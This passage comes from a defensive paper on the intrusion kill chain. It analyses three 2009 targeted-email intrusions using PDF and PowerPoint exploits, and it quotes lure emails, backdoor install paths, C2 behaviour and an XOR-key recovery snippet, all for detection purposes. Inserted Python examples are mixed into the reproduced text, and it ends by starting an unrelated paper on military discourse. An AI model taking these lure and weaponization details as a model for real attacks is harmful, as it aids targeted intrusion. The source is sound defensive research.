in the context of the kill chain, defenders had the proper perspective of the relative effect of their<br />
defenses against the intrusion attempts and where there were gaps to prioritize remediation.<br />
Figure 2: Illustration of the relative effectiveness of defenses against subsequent intrusion attempts<br />
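The per-attempt coverage in Figure 2 can be expressed as data and scored mechanically. The coverage values below are hypothetical, chosen only to mirror the narrative above; the actual campaign data is not reproduced here.<br />

```python
# "detect" = passive detection in place (white diamond), "mitigate" =
# mitigation in place (black diamond); absent phases had no capability.
attempts = {
    "December": {"weaponization": "detect", "delivery": "mitigate"},
    "March":    {"exploitation": "mitigate"},
    "June":     {"weaponization": "mitigate", "delivery": "mitigate",
                 "exploitation": "mitigate", "command_and_control": "detect"},
}

def thwarted(coverage):
    """An attempt fails if at least one phase had a mitigation in place."""
    return any(status == "mitigate" for status in coverage.values())

# Score each attempt; in this hypothetical campaign all three are blocked,
# but the per-phase data still shows where coverage was thin each month.
results = {month: thwarted(cov) for month, cov in attempts.items()}
```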
3.4 Intrusion reconstruction<br />
Kill chain analysis is a guide for analysts to understand what information is, and may be, available for<br />
defensive courses of action. It is a model to analyze the intrusions in a new way. Most detected<br />
intrusions will provide a limited set of attributes about a single phase of an intrusion. Analysts must<br />
still discover many other attributes for each phase to enumerate the maximum set of options for<br />
courses of action. Further, based on detection in a given phase, analysts can assume that prior<br />
phases of the intrusion have already executed successfully.<br />
Only through complete analysis of prior phases, as shown in Figure 3, can actions be taken at those<br />
phases to mitigate future intrusions. If one cannot reproduce the delivery phase of an intrusion, one<br />
cannot hope to act on the delivery phase of subsequent intrusions from the same adversary. The<br />
conventional incident response process initiates after the exploit phase, illustrating the self-fulfilling<br />
prophecy that defenders are inherently disadvantaged and inevitably too late. The inability to fully<br />
reconstruct all intrusion phases should drive the prioritization of tools, technologies, and processes to fill this gap.<br />
Figure 3: Late phase detection<br />
Defenders must be able to move their detection and analysis up the kill chain and more importantly to<br />
implement courses of actions across the kill chain. In order for an intrusion to be economical,<br />
adversaries must re-use tools and infrastructure. By completely understanding an intrusion, and<br />
leveraging intelligence on these tools and infrastructure, defenders force an adversary to change<br />
every phase of their intrusion in order to successfully achieve their goals in subsequent intrusions. In<br />
this way, network defenders use the persistence of adversaries’ intrusions against them to achieve a<br />
level of resilience.<br />
Equally as important as thorough analysis of successful compromises is synthesis of unsuccessful<br />
intrusions. As defenders collect data on adversaries, they will push detection from the latter phases of<br />
the kill chain into earlier ones. Detection and prevention at pre-compromise phases also necessitates<br />
a response. Defenders must collect as much information on the mitigated intrusion as possible, so<br />
that they may synthesize what might have happened should future intrusions circumvent the currently<br />
effective protections and detections (see Figure 4). For example, if a targeted malicious email is<br />
blocked due to re-use of a known indicator, synthesis of the remaining kill chain might reveal a new<br />
exploit or backdoor contained therein. Without this knowledge, future intrusions, delivered by different<br />
means, may go undetected. If defenders implement countermeasures faster than their known<br />
adversaries evolve, they maintain a tactical advantage.<br />
Figure 4: Earlier phase detection<br />
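The synthesis step described above can be sketched as a simple workflow: even when delivery is blocked on a known indicator, the attachment is still analyzed so that later-phase indicators enter the defenders' store before a future variant evades the block. This is a minimal illustration; the function and field names are hypothetical.

```python
# Minimal sketch of post-block synthesis (hypothetical names throughout):
# a blocked email is still analyzed end to end so that indicators from
# later kill chain phases (exploit, installer, C2) enter the indicator store.
def synthesize_blocked_intrusion(email, known_indicators, analyze_attachment):
    """Return new indicators recovered from an intrusion blocked at delivery."""
    matched = known_indicators & set(email["indicators"])
    assert matched, "synthesis applies to intrusions blocked on a known indicator"
    # Analyze the attachment despite the block, e.g. by detonation or
    # static analysis, and keep only the previously unknown indicators:
    new = set(analyze_attachment(email["attachment"])) - known_indicators
    known_indicators |= new  # future variants of these phases are now covered
    return new

# Hypothetical example: the sender address is already a known indicator.
known = {"dn...etto@yahoo.com"}
email = {"indicators": ["dn...etto@yahoo.com"], "attachment": "sample.pdf"}
# Stand-in analyzer that "recovers" an exploit hash and a C2 address:
found = synthesize_blocked_intrusion(
    email, known, lambda attachment: ["exploit-hash-1234", "202.abc.xyz.7"])
```

The point of the sketch is the ordering: analysis continues past the phase at which the intrusion was stopped, which is exactly what lets defenders detect a re-delivered variant of the same exploit.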
3.5 Campaign analysis<br />
At a strategic level, analyzing multiple intrusion kill chains over time will identify commonalities and<br />
overlapping indicators. Figure 5 illustrates how highly-dimensional correlation between two intrusions<br />
through multiple kill chain phases can be identified. Through this process, defenders will recognize<br />
and define intrusion campaigns, linking together perhaps years of activity from a particular persistent<br />
threat. The most consistent indicators, the campaign's key indicators, provide centers of gravity for<br />
defenders to prioritize development and use of courses of action. Figure 6 shows how intrusions may<br />
have varying degrees of correlation, but the inflection points where indicators most frequently align<br />
identify these key indicators. These less volatile indicators can be expected to remain consistent,<br />
predicting the characteristics of future intrusions with greater confidence the more frequently they are<br />
observed. In this way, an adversary’s persistence becomes a liability which the defender can leverage<br />
to strengthen its posture.<br />
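One way to illustrate this correlation (a sketch, not the authors' method): count how many of a campaign's intrusions each indicator recurs in; the least volatile, most frequently repeated indicators become candidate key indicators. The indicator values below are hypothetical, loosely modeled on the case study in section 4.

```python
from collections import Counter

# Sketch: rank indicators by how many of a campaign's intrusions they
# recur in; ties are broken alphabetically for determinism.
def key_indicators(intrusions, min_count=2):
    counts = Counter(i for indicators in intrusions for i in set(indicators))
    ranked = sorted(counts.items(), key=lambda kv: (-kv[1], kv[0]))
    return [indicator for indicator, count in ranked if count >= min_count]

# Hypothetical indicator sets loosely modeled on the case study:
intrusions = [
    {"dn...etto@yahoo.com", "CVE-2009-0658", "fssm32.exe", "202.abc.xyz.7"},
    {"dn...etto@yahoo.com", "CVE-2009-0658", "fssm32.exe", "216.abc.xyz.76"},
    {"216.abc.xyz.76", "CVE-2009-0556", "fssm32.exe"},
]
# The backdoor installer recurs in all three intrusions, making it the
# strongest candidate key indicator for this campaign.
print(key_indicators(intrusions))
```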
The principal goal of campaign analysis is to determine the patterns and behaviors of the intruders,<br />
their tactics, techniques, and procedures (TTP), to detect “how” they operate rather than specifically<br />
“what” they do. The defender’s objective is less to positively attribute the identity of the intruders than<br />
to evaluate their capabilities, doctrine, objectives and limitations; intruder attribution, however, may<br />
well be a side product of this level of analysis. As defenders study new intrusion activity, they will<br />
either link it to existing campaigns or perhaps identify a brand new set of behaviors of a theretofore<br />
unknown threat and track it as a new campaign. Defenders can assess their relative defensive<br />
posture on a campaign-by-campaign basis, and based on the assessed risk of each, develop<br />
strategic courses of action to cover any gaps.<br />
Another core objective of campaign analysis is to understand the intruders’ intent. To the extent that<br />
defenders can determine technologies or individuals of interest, they can begin to understand the<br />
adversary’s mission objectives. This necessitates trending intrusions over time to evaluate targeting<br />
patterns and closely examining any data exfiltrated by the intruders. Once again this analysis results<br />
in a roadmap to prioritize highly focused security measures to defend these individuals, networks or<br />
technologies.<br />
4. Case study<br />
To illustrate the benefit of these techniques, a case study observed by the Lockheed Martin Computer<br />
Incident Response Team (LM-CIRT) in March 2009 of three intrusion attempts by an adversary is<br />
considered. Through analysis of the intrusion kill chains and robust indicator maturity, network<br />
defenders successfully detected and mitigated an intrusion leveraging a “zero-day” vulnerability. All<br />
three intrusions leveraged a common APT tactic: targeted malicious email (TME) delivered to a limited<br />
set of individuals, containing a weaponized attachment that installs a backdoor which initiates<br />
outbound communications to a C2 server.<br />
Figure 5: Common indicators between intrusions<br />
4.1 Intrusion attempt 1<br />
Figure 6: Campaign key indicators<br />
On March 3, 2009, LM-CIRT detected a suspicious attachment within an email discussing an<br />
upcoming American Institute of Aeronautics and Astronautics (AIAA) conference. The email claimed<br />
to be from an individual who legitimately worked for AIAA, and was directed to only 5 users, each of<br />
whom had received similar TME in the past. Analysts determined the malicious attachment,<br />
tcnom.pdf, would exploit a known, but unpatched, vulnerability in Adobe Acrobat Portable Document<br />
Format (PDF): CVE-2009-0658, documented by Adobe on February 19, 2009 (Adobe, 2009) but not<br />
patched until March 10, 2009. A copy of the email headers and body follow.<br />
Received: (qmail 71864 invoked by uid 60001); Tue, 03 Mar 2009 15:01:19 +0000<br />
Received: from [60.abc.xyz.215] by web53402.mail.re2.yahoo.com via HTTP; Tue,<br />
03 Mar 2009 07:01:18 -0800 (PST)<br />
Date: Tue, 03 Mar 2009 07:01:18 -0800 (PST)<br />
From: Anne E...<br />
Subject: AIAA Technical Committees<br />
To: [REDACTED]<br />
Reply-to: dn...etto@yahoo.com<br />
Message-id: <br />
MIME-version: 1.0<br />
X-Mailer: YahooMailWebService/0.7.289.1<br />
Content-type: multipart/mixed;<br />
boundary="Boundary_(ID_Hq9CkDZSoSvBMukCRm7rsg)" X-YMail-OSG:<br />
Please submit one copy (photocopies are acceptable) of this form, and<br />
one copy of nominee’s resume to: AIAA Technical Committee<br />
Nominations,<br />
1801 Alexander Bell Drive, Reston, VA 20191. Fax number is 703/264-<br />
7551. Form can also be submitted via our web site at www.aiaa.org, Inside<br />
AIAA, Technical Committees<br />
Within the weaponized PDF were two other files, a benign PDF and a Portable Executable (PE)<br />
backdoor installation file. These files, in the process of weaponization, were encrypted using a trivial<br />
algorithm with an 8-bit key stored in the exploit shellcode. Upon opening the PDF, shellcode exploiting<br />
CVE-2009-0658 would decrypt the installation binary, place it on disk as C:\Documents and<br />
Settings\[username]\Local Settings\fssm32.exe, and invoke it. The shellcode would also extract the<br />
benign PDF and display it to the user. Analysts discovered that the benign PDF was an identical copy<br />
of one published on the AIAA website at http://www.aiaa.org/pdf/inside/tcnom.pdf, revealing adversary<br />
reconnaissance actions.<br />
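The paper notes the embedded files were encrypted with a trivial algorithm under an 8-bit key stored in the shellcode. Assuming for illustration that the algorithm is a single-byte XOR (an assumption; the paper does not name it), an analyst could recover the key by brute force, checking each candidate against the known "MZ" header of a Portable Executable:

```python
# Sketch: recover an 8-bit key by brute force, assuming (for illustration
# only; the paper does not name the algorithm) a single-byte XOR cipher.
def find_xor_key(blob, magic=b"MZ"):
    """Try all 256 keys; return (key, plaintext) when the output starts
    with `magic` (the DOS/PE header), or None if no key matches."""
    for key in range(256):
        plain = bytes(b ^ key for b in blob)
        if plain.startswith(magic):
            return key, plain
    return None

# Hypothetical sample: a PE header fragment XOR-encrypted with key 0x42.
sample = bytes(b ^ 0x42 for b in b"MZ\x90\x00\x03\x00")
key, plain = find_xor_key(sample)
```

An 8-bit keyspace is small enough that this search is instantaneous, which is why such weaponization choices yield durable indicators for defenders.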
The installer fssm32.exe would extract the backdoor components embedded within itself, saving EXE<br />
and HLP files as C:\Program Files\Internet Explorer\IEUpd.exe and IEXPLORE.hlp. Once active, the<br />
backdoor would send heartbeat data to the C2 server 202.abc.xyz.7 via valid HTTP requests. Table 2<br />
articulates the identified, relevant indicators per phase. Due to successful mitigations, the adversary<br />
never took actions on objectives, therefore that phase is marked “N/A.”<br />
Table 2: Intrusion attempt 1 indicators<br />
4.2 Intrusion attempt 2<br />
One day later, another TME intrusion attempt was executed. Analysts would identify substantially<br />
similar characteristics and link this and the previous day’s attempt to a common campaign, but<br />
analysts also noted a number of differences. The repeated characteristics enabled defenders to block<br />
this activity, while the new characteristics provided analysts additional intelligence to build resiliency<br />
with further detection and mitigation courses of action.<br />
Received: (qmail 97721 invoked by uid 60001); 4 Mar 2009 14:35:22 -0000<br />
Message-ID: <br />
Received: from [216.abc.xyz.76] by web53411.mail.re2.yahoo.com via HTTP; Wed,<br />
04 Mar 2009 06:35:20 PST<br />
X-Mailer: YahooMailWebService/0.7.289.1<br />
Date: Wed, 4 Mar 2009 06:35:20 -0800 (PST)<br />
From: Anne E... <br />
Reply-To: dn...etto@yahoo.com<br />
Subject: 7th Annual U.S. Missile Defense Conference<br />
To: [REDACTED]<br />
MIME-Version: 1.0<br />
Content-Type: multipart/mixed; boundary="0-760892832-1236177320=:97248"<br />
Welcome to the 7th Annual U.S. Missile Defense Conference<br />
The sending email address was common to the March 3 and March 4 activity, but the subject matter,<br />
recipient list, attachment name, and most importantly, the downstream IP address (216.abc.xyz.76)<br />
differed. Analysis of the attached PDF, MDA_Prelim_2.pdf, revealed an identical weaponization<br />
encryption algorithm and key, as well as identical shellcode to exploit the same vulnerability. The PE<br />
installer in the PDF was identical to that used the previous day, and the benign PDF was once again<br />
an identical copy of a file on AIAA’s website<br />
(http://www.aiaa.org/events/missiledefense/MDA_Prelim_09.pdf). The adversary never took actions<br />
towards its objectives, therefore that phase is again marked “N/A.” A summary of indicators from the<br />
first two intrusion attempts is provided in Table 3.<br />
Table 3: Intrusion attempts 1 and 2 indicators<br />
4.3 Intrusion attempt 3<br />
Over two weeks later, on March 23, 2009, a significantly different intrusion was identified due to<br />
indicator overlap, though minimal, with Intrusions 1 and 2. This email contained a PowerPoint file<br />
which exploited a vulnerability that was not, until that moment, known to the vendor or network<br />
defenders. The vulnerability was publicly acknowledged 10 days later by Microsoft as security<br />
advisory 969136 and identified as CVE-2009-0556 (Microsoft, 2009b). Microsoft issued a patch on<br />
May 12, 2009 (Microsoft, 2009a). In this campaign, the adversary made a significant shift by using a<br />
brand new, “zero-day” exploit. Details of the email follow.<br />
Received: (qmail 62698 invoked by uid 1000); Mon, 23 Mar 2009 17:14:22 +0000<br />
Received: (qmail 82085 invoked by uid 60001); Mon, 23 Mar 2009 17:14:21 +0000<br />
Received: from [216.abc.xyz.76] by web43406.mail.sp1.yahoo.com via HTTP; Mon,<br />
23 Mar 2009 10:14:21 -0700 (PDT)<br />
Date: Mon, 23 Mar 2009 10:14:21 -0700 (PDT)<br />
From: Ginette C... <br />
Subject: Celebrities Without Makeup<br />
To: [REDACTED]<br />
Message-id: <br />
MIME-version: 1.0<br />
X-Mailer: YahooMailClassic/5.1.20 YahooMailWebService/0.7.289.1<br />
Content-type: multipart/mixed; boundary="Boundary_(ID_DpBDtBoPTQ1DnYXw29L2Ng)"<br />
<br />
This email contained a new sending address, new recipient list, markedly different benign content<br />
displayed to the user (from “missile defense” to “celebrity makeup”), and the malicious PowerPoint<br />
attachment contained a completely new exploit. However, the adversaries used the same<br />
downstream IP address, 216.abc.xyz.76, to connect to the webmail service as they used in Intrusion<br />
2. The PowerPoint file was weaponized using the same algorithm as the previous two intrusions, but<br />
with a different 8-bit key. The PE installer and backdoor were found to be identical to the previous two<br />
intrusions. A summary of indicators from all three intrusions is provided in Table 4.<br />
Table 4: Intrusion attempts 1, 2, and 3 indicators<br />
Leveraging intelligence on adversaries at the first intrusion attempt enabled network defenders to<br />
prevent a known zero-day exploit. With each consecutive intrusion attempt, through complete<br />
analysis, more indicators were discovered. A robust set of courses of action enabled defenders to<br />
mitigate subsequent intrusions upon delivery, even when adversaries deployed a previously-unseen<br />
exploit. Further, through this diligent approach, defenders forced the adversary to avoid all mature<br />
indicators to successfully launch an intrusion from that point forward.<br />
Following conventional incident response methodology may have been effective in managing systems<br />
compromised by these intrusions in environments completely under the control of network defenders.<br />
However, this would not have mitigated the damage done by a compromised mobile asset that moved<br />
out of the protected environment. Additionally, focusing only on post-compromise effects (those<br />
after the exploit phase) leaves fewer indicators available. Simply using a different backdoor and installer<br />
would circumvent available detections and mitigations, enabling adversary success. By preventing<br />
compromise in the first place, the resultant risk is reduced in a way unachievable through the<br />
conventional incident response process.<br />
5. Summary<br />
Intelligence-driven computer network defense is a necessity in light of advanced persistent threats. As<br />
conventional, vulnerability-focused processes are insufficient, understanding the threat itself, its<br />
intent, capability, doctrine, and patterns of operation is required to establish resilience. The intrusion<br />
kill chain provides a structure to analyze intrusions, extract indicators and drive defensive courses of<br />
actions. Furthermore, this model prioritizes investment for capability gaps, and serves as a framework<br />
to measure the effectiveness of the defenders’ actions. When defenders consider the threat<br />
component of risk to build resilience against APTs, they can turn the persistence of these actors into a<br />
liability, decreasing the adversary’s likelihood of success with each intrusion attempt.<br />
The kill chain shows an asymmetry between aggressor and defender: any one component repeated<br />
by the aggressor is a liability. Understanding the nature of repetition for given adversaries, be it out of<br />
convenience, personal preference, or ignorance, is an analysis of cost. Modeling the cost-benefit ratio<br />
to intruders is an area for additional research. When that cost-benefit is decidedly imbalanced, it is<br />
perhaps an indicator of information superiority of one group over the other. Models of information<br />
superiority may be valuable for computer network attack and exploitation doctrine development.<br />
Finally, this paper presents an intrusion kill chain model in the context of computer espionage.<br />
Intrusions may represent a broader problem class. This research may strongly overlap with other<br />
disciplines, such as IED countermeasures.<br />
References<br />
Adobe. APSA09-01: Security Updates available for Adobe Reader and Acrobat versions 9 and earlier, February<br />
2009. URL http://www.adobe.com/support/security/advisories/apsa09-01.html.<br />
Duran, F., Conrad, S. H., Conrad, G. N., Duggan, D. P. and Held, E. B. Building A System For Insider Security. IEEE<br />
Security & Privacy, 7(6):30–38, 2009. doi: 10.1109/MSP.2009.111.<br />
Epstein, Keith, and Elgin, Ben. Network Security Breaches Plague NASA, November 2008. URL<br />
http://www.businessweek.com/print/magazine/content/08_48/b4110072404167.htm.<br />
Hayes, Ashton (LTC). Defending Against the Unknown: Antiterrorism and the Terrorist Planning Cycle. The<br />
Guardian, 10(1):32–36, 2008. URL http://www.jcs.mil/content/files/2009-04/041309155243_spring2008.pdf.<br />
Krekel, Bryan. Capability of the People’s Republic of China to Conduct Cyber Warfare and Computer Network<br />
Exploitation, October 2009. URL http://www.uscc.gov/researchpapers/2009/NorthropGrumman_<br />
PRC_Cyber_Paper_FINAL_Approved%20Report_16Oct2009.pdf.<br />
Lewis, James Andrew. Holistic Approaches to Cybersecurity to Enable Network Centric Operations, April 2008.<br />
URL http://armedservices.house.gov/pdfs/TUTC040108/Lewis_Testimony040108.pdf.<br />
Mandiant. M-Trends: The Advanced Persistent Threat, January 2010. URL<br />
http://www.mandiant.com/products/services/m-trends.<br />
Microsoft. Microsoft Security Bulletin MS09-017: Vulnerabilities in Microsoft Office PowerPoint Could Allow<br />
Remote Code Execution (967340), May 2009a. URL http://www.microsoft.com/technet/security/<br />
bulletin/ms09-017.mspx.<br />
Microsoft. Microsoft Security Advisory (969136): Vulnerability in Microsoft Office PowerPoint Could Allow Remote<br />
Code Execution, April 2009b. URL http://www.microsoft.com/technet/security/advisory/969136.mspx.<br />
Mitropoulos, Sarandis, Patsosa, Dimitrios and Douligeris, Christos. On Incident Handling and Response: A state-of-the-art<br />
approach. Computers & Security, 5:351–370, July 2006. URL<br />
http://dx.doi.org/10.1016/j.cose.2005.09.006.<br />
National Institute of Standards and Technology. Special Publication 800-61: Computer Security Incident Handling<br />
Guide, March 2008. URL http://csrc.nist.gov/publications/PubsSPs.html.<br />
National Research Council. Countering the Threat of Improvised Explosive Devices: Basic Research<br />
Opportunities (Abbreviated Version), 2007. URL http://books.nap.edu/catalog.php?record_id=11953.<br />
Sakuraba, T., Domyo, S., Chou, Bin-Hui and Sakurai, K. Exploring Security Countermeasures along the Attack<br />
Sequence. In Proc. Int. Conf. Information Security and Assurance ISA 2008, pages 427–432, 2008.<br />
doi:10.1109/ISA.2008.112.<br />
Stamos, Alex. “Aurora” Response Recommendations, February 2010. URL https://www.isecpartners.<br />
com/files/iSEC_Aurora_Response_Recommendations.pdf.<br />
Tirpak, John A. Find, Fix, Track, Target, Engage, Assess. Air Force Magazine, 83:24–29, 2000. URL<br />
http://www.airforce-magazine.com/MagazineArchive/Pages/2000/July%202000/0700find.aspx.<br />
UK-NISCC. National Infrastructure Security Co-ordination Centre: Targeted Trojan Email Attacks, June 2005.<br />
URL https://www.cpni.gov.uk/docs/ttea.pdf.<br />
United States Army Training and Doctrine Command. A Military Guide to Terrorism in the Twenty-First Century,<br />
August 2007. URL http://www.dtic.mil/srch/doc?collection=t3&id=ADA472623.<br />
US-CERT. Technical Cyber Security Alert TA05-189A: Targeted Trojan Email Attacks, July 2005. URL<br />
http://www.us-cert.gov/cas/techalerts/TA05-189A.html.<br />
U.S.-China Economic and Security Review Commission. 2008 Report to Congress of the U.S. China Economic<br />
and Security Review Commission, November 2008. URL http://www.uscc.gov/annual_report/2008/<br />
annual_report_full_08.pdf.<br />
U.S.-China Economic and Security Review Commission. 2009 Report to Congress of the U.S.-China Economic<br />
and Security Review Commission, November 2009. URL http://www.uscc.gov/annual_report/2009/<br />
annual_report_full_09.pdf.<br />
U.S. Department of Defense. Joint Publication 3-13 Information Operations, February 2006. URL<br />
http://www.dtic.mil/doctrine/new_pubs/jp3_13.pdf.<br />
U.S. Department of Defense. Joint Publication 3-60 Joint Targeting, April 2007. URL http://www.dtic.<br />
mil/doctrine/new_pubs/jp3_60.pdf.<br />
Willison, Robert and Siponen, Mikko. Overcoming the insider: reducing employee computer crime through<br />
Situational Crime Prevention. Communications of the ACM, 52(9):133–137, 2009. doi: http://doi.acm.<br />
org/10.1145/1562164.1562198.<br />
The Hidden Grand Narrative of Western Military Policy: A<br />
Linguistic Analysis of American Strategic Communication<br />
Saara Jantunen and Aki-Mauri Huhtinen<br />
National Defence University, Helsinki, Finland<br />
sijantunen@gmail.com<br />
aki.huhtinen@mil.fi<br />
Abstract: War engages civilians in a very different way than is traditionally understood. The military-industrial<br />
complex has rooted itself permanently in the civilian world. In the US, recruiters have long operated on<br />
university campuses, the Pentagon has funded the entertainment industry for decades, and the current trend in<br />
most militaries is to advertise military careers that are less about war and more about individual expertise in<br />
civilian professions. The key venue for military recruiting is the shopping mall, where teenagers can play war games<br />
and enlist. Strategic communication has replaced information warfare. In a complex world, strategic<br />
communication exploits all possible media. As Art of War has been replaced by science, the representations of<br />
war and the role of the military have changed. Both war and military forces are now associated with binary roles:<br />
destruction and humanity, killing and liberating. The logic behind 'bombing for peace' is encoded in the Grand<br />
Military Narrative. This narrative is hidden in American (and NATO) strategies such as Effects Based Operations,<br />
which rely heavily on technology. As people aim to rationalize the world with technology, they fail to take into<br />
account the uncertainty it brings. In warfare, that uncertainty is verbalized as “friendly fire”, “collateral damage” or<br />
simply as “accident”. Success and failure are attributed to technology. Technology is no longer a tool, but an ideology<br />
and an actor that not only 'enables' the military to take action, but frees it of responsibility. This article analyzes<br />
American strategy discourse and the standards and trends of rhetoric it creates. The article focuses on<br />
pinpointing some of the linguistic choices and discourses that define the so-called 'techno-speak', the product of<br />
modern techno-ideology. These discourses result in representations of techno-centered binary values, which<br />
steer military strategy and foreign policy.<br />
Keywords: military-industrial complex, revolution in military affairs, effects based operations, discourse analysis,<br />
military technology<br />
1. The grand military narrative<br />
"You want to hit only the guy you want, not the school bus three cars back", says Steve Felix of the<br />
Naval Air Warfare Center (Matthews, 2010). "The bad guys are figuring out how to hide out in homes<br />
and near schools. We can't go in and drop large bombs - that just doesn't work any more", explains<br />
Steve Martin, the representative of Lockheed Martin. Raytheon's Griffin, currently deployed in<br />
Predator drones, is a new, lighter and more precise missile type. "The Griffin's maneuverability and<br />
accuracy reduce the risk of "collateral damage"' says an Army representative. "When you can start<br />
producing a lower ratio of collateral damage, that's how you win this kind of war", notes Anthony<br />
Cordesman of the Center for Strategic and International Studies (Wichner, 2010). No<br />
more 'enemy', but virtuous precision to rid the world of the "bad guys".<br />
In July 2010, the Army Experience Center (AEC) in a Philadelphia mall was getting ready to close its<br />
doors after a successful project. The Center offered visitors information on military careers as well as<br />
video games and simulators (some of which are used to train the troops). The traditional images of<br />
depressing boot camp physical training disappear once the teenagers (13 and older, according to the<br />
AEC) get to show with combat simulators what they have been practicing most of their lives. The<br />
youth, wandering the malls, are the perfect target for recruiters. Because they know gaming, warfare<br />
has to become game-like. Now, the entertainment industry is replacing boot camps. Being good at war is<br />
made easy. Being good at war is about pressing a button: In the Army Experience Center, the<br />
teenagers can "touch and feel and experience what the army is all about", explains one of the<br />
Center's recruiters (thearmyexperience, 2008). High-tech weapons to kill the "bad guys" from a<br />
comfortable distance and virtual simulation create combat experience: Whatever the problem, the<br />
answer lies in technology. This is the Grand Military Narrative.<br />
2. The military-industrial-complex and revolution in military affairs<br />
The military-industrial complex gave birth to the Revolution in Military Affairs. The future of the military<br />
is computers, information networks, and precision-guided munitions (Toffler, 1981, 1993).<br />
Technological advances are used to solve the military and strategic challenges of the U.S. (Shimko,<br />
2010: 213). This revolution, or evolution, is depicted by the Grand Military Narrative.<br />
RMA's focus on technology has led to technology-centered strategies and doctrines. Technology<br />
offers the option of unmanned war, to “bring knowledge forward” for the people whose observation is<br />
limited (Rantapelkonen, 2006:72). “Maximizing output” and “minimizing input” (citing Lyotard, 1984 in<br />
Rantapelkonen, 2006:73) match the American ideal of “easy living”. Lyotard argues that technology is<br />
“good” because it is efficient, not because it is “true”, “just” or “beautiful”.<br />
According to Rantapelkonen (2006), 'war on terror' is technologically driven. However, the binary<br />
image of war contains the idea of not only destroying and devastating, but also avoiding risk, threat<br />
and death by liberating, helping and building. Der Derian (2008) calls this "virtuous war". He argues<br />
that the military-industrial complex needs binary rhetoric such as 'bombing for peace' and 'killing to<br />
live' in order to operate and make profit: Technology is in service of virtue. As death and destruction<br />
are no longer accepted, technology steps in. By replacing the soldier with a precision (fire-and-forget)<br />
weapon, 'targets can be hit' and 'operations conducted' without causing protests on the home front.<br />
The evolution of warfare demands that science be in the service of war. Technology “enables us to do a lot<br />
more stuff” and to “more effectively prosecute those operations” (U.S. Department of Defense, 2003).<br />
Because of its efficiency and speed, strategies, doctrines and even foreign policy rely on the sole use<br />
of technology. The Powell Doctrine aimed to solve problems by overwhelming force in the form of<br />
superior weapons technology. Shock and Awe in 2003 worked much the same way.<br />
However, the modern narratives and threat descriptions do not, after all, change much. President<br />
Obama no longer uses the term "war on terrorism", but this choice of term did not change the warfare<br />
in Afghanistan or Iraq. The US, China, Russia, India, Pakistan, Israel and North Korea are still<br />
developing nuclear weapons. The new threat descriptions have not removed the old threats. Despite<br />
precision munitions, B52 bombers are still in use. Real change takes place first in discourse;<br />
realization lags behind.<br />
The Grand Military Narrative contains a techno-ideology, which is encoded in language. In this<br />
Narrative war has two aspects: the "how" and "why". How wars are conducted is a matter of<br />
technology descriptions. Why wars are fought is a matter of value systems. The merging of these two<br />
aspects creates what is now known as strategic communication.<br />
3. From information warfare to strategic communication<br />
Not only the language of press briefings but also soldier-to-soldier communication has changed.<br />
On the battlefield and in combat, propaganda has been replaced by strategic and psychological<br />
influence. The global and social media create an increasing influence and new technology solutions<br />
create an opportunity to make an impact. Strategic communication exploits all these.<br />
The new generation's war, the Gulf War, was a catalyst for public discussion on the new wave of<br />
Information Operations. The Kosovo War and 9/11 sped up the discussion. A whole new narrative<br />
was created during the 'War Against Terrorism'.<br />
According to Taylor (2003), the concepts of political, psychological or information warfare are<br />
outdated. Instead, we use the concept of 'strategic communication', of which Taylor recognizes three<br />
types. The first is “public diplomacy”, referring to the state and political level. The second is “public affairs”, which<br />
contains the global media. The third type, Information operations (Info Ops), deals with military<br />
capability. Strategic communication has abandoned the Cold War era categories of propaganda: the<br />
so called “black” (covert), “white” (overt) and “grey” (unknown) propaganda. Today, the speed of<br />
communication is enough to disturb our perception management capability. The 24/7 model takes<br />
advantage of our values and understanding of democracy: we say no to censorship and want all<br />
information to be available at all times, everywhere.<br />
Strategic communication is a child of the complex world. Instead of rational knowledge, we have<br />
information flow. Planning and execution are parallel processes; speed dictates the operational<br />
modes, and strategic communication is an attempt to control all this.<br />
4. The question of responsibility: Effects Based Operations<br />
Effects Based Operations (EBO) is a US military concept and doctrine that stands for "operations that<br />
are planned, executed, assessed, and adapted based on a holistic understanding of the operational<br />
environment in order to influence or change system behaviour or capabilities using the integrated<br />
application of select instruments of power to achieve directed policy aims". On the day of "Shock and<br />
Awe" in 2003, Colonel Gary L. Crowder, chief of strategy, concepts and doctrine, elaborated the<br />
concept in layperson's terms in a press briefing dedicated to EBO alone (U.S. Department of<br />
Defense, 2003). Before he explains any further, the concepts of a technology-based<br />
approach and doctrine step in. Crowder explains that the new approach was "more than just people, it<br />
was the combination of a fortuitous development of different capabilities and technologies [...] that<br />
enabled us to do that." The phrases that follow this capture the very essence of the discourse that<br />
characterized American public relations during the beginning of the war:<br />
[...] what we wanted to do was in fact to achieve some sort of policy objective, and that<br />
you could, in fact, craft military operations to better achieve those policy operations in a<br />
more efficient and effective manner.<br />
The key words here are "efficient" and "effective". EBO was, according to Crowder, a way to mitigate<br />
collateral damage. In order to explain the concepts of "collateral damage" and "unintended damage",<br />
Crowder had to discuss risk-taking as part of doctrine.<br />
Crowder explains that even if collateral and unintended damage happen, and "both of these types of<br />
damage will take place", they "still went through a methodical process". This is precisely the problem<br />
with a strategy that relies almost solely on the performance of technology. Technology fails, and when it<br />
does, responsibility for that failure is placed on technology itself. According to the strategy, both<br />
collateral and unintended damage are unavoidable, technology has its fail ratio, and these are facts<br />
that simply have to be accepted. In Virilio's (1989: 8-9) terms, the Art of War has turned into the Science of the<br />
Accident.<br />
Technology is complex and when techno-speak enters press-briefings such as Crowder's, a new kind<br />
of language is created. Zizek (2009) argues that public communication increasingly applies expert<br />
and scientific jargon that no longer translates to the 'common speak' of society. The 'expert<br />
speak', despite its abstract nature, still shapes our thinking, especially when it is labeled with<br />
words such as 'precision', 'smart' and 'efficiency'. With examples of virtuous warring (liberating)<br />
and precise and efficient operating models (avoiding collateral damage), it complies with the modern<br />
imperative of clean and safe, effective and lethal, and yet moral and humane war fighting. The kind of<br />
war that we will accept.<br />
Although EBO as it was first created and intended has already been abandoned by the U.S. Department<br />
of Defense, it created a new narrative tradition of virtue and of the superiority of technology and binary<br />
values. This tradition continues to influence Western military discourses. This will be discussed in<br />
Section 5.<br />
5. The grand military narrative: Analysis<br />
In order to pinpoint the Grand Military Narrative of strategic communication, we have to look at the<br />
theme and structures of the strategists' language. The United States has an undisputed position as the<br />
military trend-setter and the creator of new military concepts. This makes American strategy papers<br />
and press briefings on strategy and doctrine a good resource for analyzing the evolution of strategic<br />
communication. The upcoming sections continue the discussion on strategy, doctrine and Effects<br />
Based Operations and their influence on discourse.<br />
The Joint Operating Environment 2010 (JOE10) (United States Joint Forces Command, 2010)<br />
provides the framework for our analysis and aims to predict and forecast the future of American<br />
